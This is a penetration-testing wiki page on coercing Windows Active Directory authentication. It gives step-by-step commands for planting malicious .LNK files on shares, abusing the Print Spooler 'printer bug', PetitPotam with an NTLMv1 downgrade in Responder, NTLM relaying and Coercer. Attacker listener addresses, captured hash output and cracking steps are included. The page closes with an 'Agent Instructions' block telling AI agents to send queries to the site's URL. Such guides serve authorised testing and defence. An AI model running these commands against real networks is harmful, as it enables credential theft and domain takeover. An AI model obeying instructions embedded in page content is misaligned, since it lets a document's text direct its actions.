# Coercing Authentication

### Harvest NTLMv2/v1 Hashes with Write Access to Shares

The [following example](https://twitter.com/mpgn_x64/status/1453018750253424643?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1453018750253424643%7Ctwgr%5E0fe6e46bc61c94f27278793c3b0620a3c2ed5bd6%7Ctwcon%5Es1_\&ref_url=https%3A%2F%2Fcdn.iframe.ly%2Fo0HzCyi%3Fapp%3D1) demonstrates performing this attack with CrackMapExec, however, it can also be performed by crafting a custom `.LNK` file.

1\. Enumerate the hosts shares

```bash
crackmapexec smb $ip -u $username -p $password --shares
```

2\. Create a malicious .LNK file calling back to your Responder.py IP

```bash
crackmapexec smb $ip -u $username -p $password -M slinky -o NAME=$share SERVER=[ResponderIP]
```

3\. After waiting and (hopefully) obtaining several NTLM hashes, cleanup the malicious file

```bash
crackmapexec smb $ip -u $username -p $password -M slinky -o NAME=$share SERVER=$responder_ip CLEANUP=True
```

#### Notes

* Put an underscore as the first character in the file name (e.g., `NAME=_bonus.xlsx` and it will put the file at the top of the directory, making it more likely to render and send a hash to the malicious server.&#x20;

### The Printer Bug&#x20;

If a machine that we have compromised is configured with [unconstrained delegation](/pentesting/infrastructure/active-directory/delegation-abuse/unconstrained-delegation.md) we are able to capture any of the TGTs from machines/accounts that have authenticated to it. If we're able to obtain a TGT from a machine account, we can craft service tickets and obtain administrative access to it - this also works for domain controllers.&#x20;

It should be noted that in order to successfully exploit the printer bug, we must have already obtained a session as or valid domain user credentials.&#x20;

#### Enumerate Print Spooler Service

Enumerate Print Spooler service with ItWasAllADream:

```bash
# Enumerate Print Spooler with ItWasALlADream
docker run -it itwasalladream -u $username -p $password -d $domain $target -v

# Enumerate with CrackMapExec
crackmapexec smb $ip -u $username -p $password -M spooler

# Enumerate Print Spooler with Impacket
python rpcdump.py @$target | egrep 'MS-RPRN|MS-PAR'

# SpoolerScan.ps1
.\SpoolerScan.ps1
```

#### Exploiting the Printer Bug with [SpoolSample.exe](https://github.com/leechristensen/SpoolSample)

1\. We first need to monitor for any new TGTs on the system that has unconstrained delegation configured. Rubeus provides us with the handy functionality to accomplish this:

```bash
.\Rubeus.exe monitor /targetuser:$machineaccount /interval:5 /nowrap
```

2\. We can then execute `SpoolSample.exe` on the host to coerce authentication:

```bash
.\SpoolSample.exe $target $attacker
```

3\. After running `SpoolSample.exe` we should then aobserve a TGT on the attacker controlled system.

#### Remotely Exploiting the Printer Bug

* [Dementor.py](https://github.com/NotMedic/NetNTLMtoSilverTicket/blob/master/dementor.py)
* [Printerbug.py](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py)

Alternatively, we can accomplish this same exploitation path remotely using Impacket's ntlmrelayx to relay the credentials:

```bash
# Exploiting the Printerbug with Dementor.py
dementor.py -d $domain -u $username -p $password $attackerip $targetfqdn

# Exploiting the Printerbug with Printerbug.py
python printerbug.py $domain/$username:$password@$targetfqdn $attackerip

# Relay the authentication attempt to the target server
 ntlmrelayx.py -smb2support -t smb://$targetx
```

### PetitPotam

While [PetitPotam](https://github.com/topotam/PetitPotam) itself has been rendered a little redundant due to tools like Coercer accomplishing the same, yet more. It is still important to discuss as it's still all that's needed to [compromise a significant amount](https://blog.zsec.uk/chasing-the-silver-petit-potam/) of Active Directory environments. One of the most simple yet effective attack paths with PetitPotam would look like the following:

1\. The tester first identifies all of the domain controllers in the domain, this can be done either through DNS or by identifying common ports associated with DC's such as 88/tcp.&#x20;

2\. Modify the configuration of your Responder installation so that the challenge paramter is set to the following value and run Responder in Analyze mode with the `--lm` flag to attempt to downgrade the authentication:

```bash
# Responder Challenge Attribute
1122334455667788

# Run Responder with 
responder -I $interface -A --lm 
```

3\. The tester can then attempt to force authentication from the domain controllers to the attacker controlled server using PetitPotam:

```bash
python3 PetitPotam.py $listenerip $targetip
```

4\. The output received should look like the following:

```bash
[SMB] NTLMv1 Client   : 10.0.0.5
[SMB] NTLMv1 Username : OASIS\PARZDC$
[SMB] NTLMv1 Hash     : PARZDC$::OASIS:FFJSFOE[SNIP]
```

5\. With the NTLMv1 hash now retrieved, the tester can utilize the [ntlmv1-multi](https://github.com/evilmog/ntlmv1-multi) tool to obtain the appropriate format for cracking:

```bash
ntlmv1.py --ntlmv1 PARZDC$::OASIS:FFJSFOE[SNIP]
```

6\. This hash can then be cracked via Hashcat with the instructions displayed on screen or alternatively can be submitted to [crack.sh](https://crack.sh).&#x20;

### Trigger NTLM Authentication over HTTP

```bash
## https://twitter.com/n00py1/status/1481385989025280000?s=20&t=rMzsQI6ENH2SYVVaTYTqAA
Invoke-WebRequest -UseDefaultCredentials
```

### Coercer

[Coercer](https://github.com/p0dalirius/Coercer) is a Python script which automagically attempt to coerce an arbitrary machine to an attacker controlled device in several ways.

```bash
# Basic use of Coercer.py
Coercer.py -d $domain -u $username -p $password --listener $attackerip --target $targetip
```

### References

{% embed url="<https://www.praetorian.com/blog/active-directory-computer-account-smb-relaying-attack/>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ttp.parzival.sh/pentesting/infrastructure/active-directory/coercing-authentication.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.